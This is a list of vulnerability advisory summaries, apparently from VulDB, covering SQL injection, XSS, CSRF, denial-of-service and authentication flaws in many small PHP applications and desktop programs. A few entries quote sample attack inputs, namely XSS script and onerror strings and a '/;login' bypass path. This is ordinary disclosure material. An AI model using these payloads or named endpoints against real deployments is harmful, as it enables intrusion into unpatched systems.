A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /template/1/default/. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252698 is the identifier assigned to this vulnerability.
A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \employee-tasks-php\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695.
A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Conecction Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in South River WebDrive 18.00.5057. It has been declared as problematic. This vulnerability affects unknown code of the component New Secure WebDAV. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-252682 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Hyper CdCatalog 2.3.1. It has been classified as problematic. This affects an unknown part of the component HCF File Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-252681 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written.
A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Nsasoft Network Sleuth 3.0.0.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-252674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Login System 1.0. Affected by this issue is some unknown functionality of the file add-user.php. The manipulation of the argument qr-code leads to cross site scripting. The attack may be launched remotely. VDB-252470 is the identifier assigned to this vulnerability.
A vulnerability was found in CodeAstro Real Estate Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file profile.php of the component Feedback Form. The manipulation of the argument Your Feedback with the input &lt;img src=x onerror=alert(document.cookie)&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252458 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Courier Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /track-result.php. The manipulation of the argument Consignment leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /file/request.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file /general/approve_center/list/input_form/data_picker_link.php. The manipulation of the argument dataSrc leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /general/address/private/address/query/delete.php. The manipulation of the argument where_repeat leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.6. Affected is an unknown function of the file pda/appcenter/submenu.php. The manipulation of the argument appid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in Tongda OA 2017 up to 11.7. This issue affects some unknown processing of the file /inc/package_static_resources.php. The manipulation leads to resource consumption. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Tongda OA 11.2/11.3/11.4/11.5/11.6. This vulnerability affects unknown code of the file general/hr/setting/attendance/leave/data.php of the component Annual Leave Handler. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been classified as critical. This affects an unknown part of the file birdsupdate.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Blood Bank Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /file/updateprofile.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Codezips Pet Shop Management System 1.0. Affected is an unknown function of the file birdsadd.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in open-scratch Teaching &amp;#22312;&amp;#32447;&amp;#25945;&amp;#23398;&amp;#24179;&amp;#21488; up to 2.7. This vulnerability affects unknown code of the file /api/sys/ng-alain/getDictItemsByTable/ of the component URL Handler. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Codezips Online Institute Management System 1.0. This issue affects some unknown processing of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in Codezips Free Exam Hall Seating Management System 1.0. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Blood Bank System 1.0. This affects an unknown part of the file /admin/blood/update/B-.php. The manipulation of the argument Bloodname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Klokan MapTiler tileserver-gl 2.3.1 and classified as problematic. This issue affects some unknown processing of the component URL Handler. The manipulation of the argument key leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in ESAFENET CDG 5. Affected by this issue is some unknown functionality of the file /com/esafenet/servlet/policy/HookWhiteListService.java. The manipulation of the argument policyId leads to sql injection. The attack may be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in LinZhaoguan pb-cms up to 2.0.1. Affected is an unknown function of the file /admin#themes of the component Theme Management Module. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms up to 2.0.1. This issue affects some unknown processing of the file /admin#article/edit?id=2 of the component Edit Article Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in LinZhaoguan pb-cms up to 2.0.1. This vulnerability affects unknown code of the file /admin#permissions of the component Permission Management Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /kortex_lite/control/edit_profile.php of the component POST Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Codezips Hospital Appointment System 1.0. This affects an unknown part of the file /loginAction.php. The manipulation of the argument Username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in code-projects Blood Bank Management System 1.0. Affected by this issue is some unknown functionality of the file /file/delete.php. The manipulation of the argument bid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other endpoints might be affected as well.
A vulnerability classified as critical was found in Project Worlds Online Time Table Generator 1.0. Affected by this vulnerability is an unknown functionality of the file /timetable/staff/staffdashboard.php?info=updateprofile. The manipulation of the argument n leads to sql injection. The attack can be launched remotely.
A vulnerability classified as critical has been found in Project Worlds Online Time Table Generator 1.0. Affected is an unknown function of the file /timetable/admin/admindashboard.php?info=add_course. The manipulation of the argument c leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in didi Super-Jacoco 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /cov/triggerEnvCov. The manipulation of the argument uuid leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Project Worlds Simple Web-Based Chat Application 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument Name/Comment leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions different parameters to be affected which do not correlate with the screenshots of a successful attack.
A vulnerability has been found in Project Worlds Simple Web-Based Chat Application 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Codezips Pet Shop Management System 1.0. Affected is an unknown function of the file /deletebird.php. The manipulation of the argument t1 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Codezips Pet Shop Management System 1.0. This issue affects some unknown processing of the file /animalsupdate.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /deleteanimal.php. The manipulation of the argument t1 leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter "refno" to be affected. But further inspection indicates that the name of the affected parameter is "t1".
A vulnerability was found in Codezips Pet Shop Management System 1.0. It has been classified as critical. This affects an unknown part of the file /animalsadd.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter "refno" to be affected. But further inspection indicates that the name of the affected parameter is "id".
A vulnerability was found in Project Worlds Student Project Allocation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /student/project_selection/move_up_project.php of the component Project Selection Page. The manipulation of the argument up leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Project Worlds Student Project Allocation System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /student/project_selection/remove_project.php of the component Project Selection Page. The manipulation of the argument no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in Project Worlds Student Project Allocation System 1.0. Affected is an unknown function of the file /student/project_selection/project_selection.php of the component Project Selection Page. The manipulation of the argument project_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Attendance and Payroll System 1.0. This issue affects some unknown processing of the file /admin/overtime_add.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Attendance and Payroll System 1.0. This vulnerability affects unknown code of the file /admin/overtime_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /bloodrequest.php. The manipulation of the argument msg leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /file/infoAdd.php. The manipulation of the argument bg leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /file/delete.php. The manipulation of the argument bid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Blood Bank Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /file/cancel.php. The manipulation of the argument reqid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Blood Bank Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /file/accept.php. The manipulation of the argument reqid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in PHPGurukul Vehicle Record System 1.0. This affects an unknown part of the file /admin/edit-brand.php. The manipulation of the argument Brand Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions the parameter "phone_number" to be affected. But this might be a mistake because the textbox field label is "Brand Name".
A vulnerability was found in code-projects Blood Bank Management 1.0 and classified as critical. This issue affects some unknown processing of the file /file/accept.php. The manipulation of the argument reqid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Blood Bank Management up to 1.0 and classified as critical. This vulnerability affects unknown code of the file /abs.php. The manipulation of the argument search leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/edit_customer.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/edit_fuel.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/ajax_product.php. The manipulation of the argument drop_services leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Sales Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /addcustind.php. The manipulation of the argument refno leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Sales Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /addcustcom.php. The manipulation of the argument refno leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Sales Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /addstock.php. The manipulation of the argument prodtype leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. Affected by this issue is some unknown functionality of the file /admin/invoice.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/print.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Online Exam System 1.0. Affected is an unknown function of the file /admin-dashboard. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This affects a different product and is a different issue than CVE-2024-40480.
A vulnerability was found in code-projects Hospital Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/add-doctor.php. The manipulation of the argument docname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Best House Rental Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php?page=tenants of the component Manage Tenant Details. The manipulation of the argument Last Name/First Name/Middle Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only shows the field "Last Name" to be affected. Other fields might be affected as well.
A vulnerability classified as critical was found in SourceCodeHero Clothes Recommendation System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/home.php. The manipulation of the argument view/view1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodeHero Clothes Recommendation System 1.0. Affected is an unknown function of the file /admin/home.php?con=add. The manipulation of the argument cat/subcat/ t1/t2/text leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodeHero Clothes Recommendation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/index.php of the component Admin Login Page. The manipulation of the argument t1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Garbage Collection Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "username" to be affected. But it must be assumed that the parameter "password" is affected as well.
A vulnerability, which was classified as critical, has been found in PHPGurukul Vehicle Record System 1.0. This issue affects some unknown processing of the file /admin/search-vehicle.php. The manipulation of the argument searchinputdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304.
A vulnerability, which was classified as critical, was found in PHPGurukul Medical Card Generation System 1.0. Affected is an unknown function of the file /admin/search-medicalcard.php of the component Search. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in PHPGurukul Medical Card Generation System 1.0. This issue affects some unknown processing of the file /admin/view-enquiry.php of the component View Enquiry Page. The manipulation of the argument viewid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.
A vulnerability classified as critical was found in PHPGurukul Medical Card Generation System 1.0. This vulnerability affects unknown code of the file /admin/view-card-detail.php of the component Managecard View Detail Page. The manipulation of the argument viewid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in PHPGurukul Medical Card Generation System 1.0. This affects an unknown part of the file /admin/edit-card-detail.php of the component Managecard Edit Card Detail Page. The manipulation of the argument editid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in PHPGurukul Medical Card Generation System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/changeimage.php of the component Managecard Edit Image Page. The manipulation of the argument editid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in PHPGurukul Medical Card Generation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/card-bwdates-reports-details.php of the component Report of Medical Card Page. The manipulation of the argument fromdate/todate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in ZZCMS 2023 and classified as critical. This issue affects some unknown processing of the file 3/Ebak5.1/upload/ChangeTable.php. The manipulation of the argument savefilename leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in ZZCMS 2023. This affects an unknown part of the file 3/qq-connect2.0/API/com/inc.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux"&gt;&lt;script&gt;alert('XSS')&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input &lt;marquee&gt;HACKED&lt;/marquee&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability.
A vulnerability was found in ESAFENET CDG 5. It has been declared as critical. This vulnerability affects unknown code of the file /com/esafenet/servlet/policy/PrintPolicyService.java. The manipulation of the argument policyId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ESAFENET CDG 5. It has been classified as critical. This affects an unknown part of the file /com/esafenet/servlet/user/ReUserOrganiseService.java. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ESAFENET CDG 5 and classified as critical. Affected by this issue is some unknown functionality of the file /com/esafenet/servlet/ajax/UsbKeyAjax.java. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Telestream Sentry 6.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /?page=reports of the component Reports Page. The manipulation of the argument z leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300.
A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292.
A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /manage_medicine.php of the component Manage Medicines Page. The manipulation of the argument name/address/doctor_address/suppliers_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /manage_customer.php of the component Manage Customer Page. The manipulation of the argument suppliers_name/address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting files to be affected. Other parameters might be affected as well.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /manage_supplier.php of the component Manage Supplier Page. The manipulation of the argument address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
A vulnerability was found in code-projects Pharmacy Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /add_new_invoice.php. The manipulation of the argument text leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Tecno 4G Portable WiFi TR118 V008-20220830. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /goform/goform_get_cmd_process of the component SMS Check. The manipulation of the argument order_by leads to sql injection. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in PHPGurukul IFSC Code Finder Project 1.0 and classified as problematic. This vulnerability affects unknown code of the file search.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in PHPGurukul Boat Booking System 1.0. This affects an unknown part of the file /admin/book-details.php of the component Booking Details Page. The manipulation of the argument Official Remark leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288.
A vulnerability has been found in didi DDMQ 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Console Module. The manipulation with the input /;login leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in code-projects Blood Bank System up to 1.0. Affected is an unknown function of the file /admin/massage.php. The manipulation of the argument bid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in code-projects Hospital Management System 1.0. This issue affects some unknown processing of the file get_doctor.php. The manipulation of the argument specilizationid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287.
A vulnerability classified as critical was found in code-projects Hospital Management System 1.0. This vulnerability affects unknown code of the file change-password.php. The manipulation of the argument cpass leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Codezips Sales Management System 1.0. This affects an unknown part of the file deletecustind.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Sales Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file checkuser.php. The manipulation of the argument name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Codezips Sales Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file deletecustcom.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
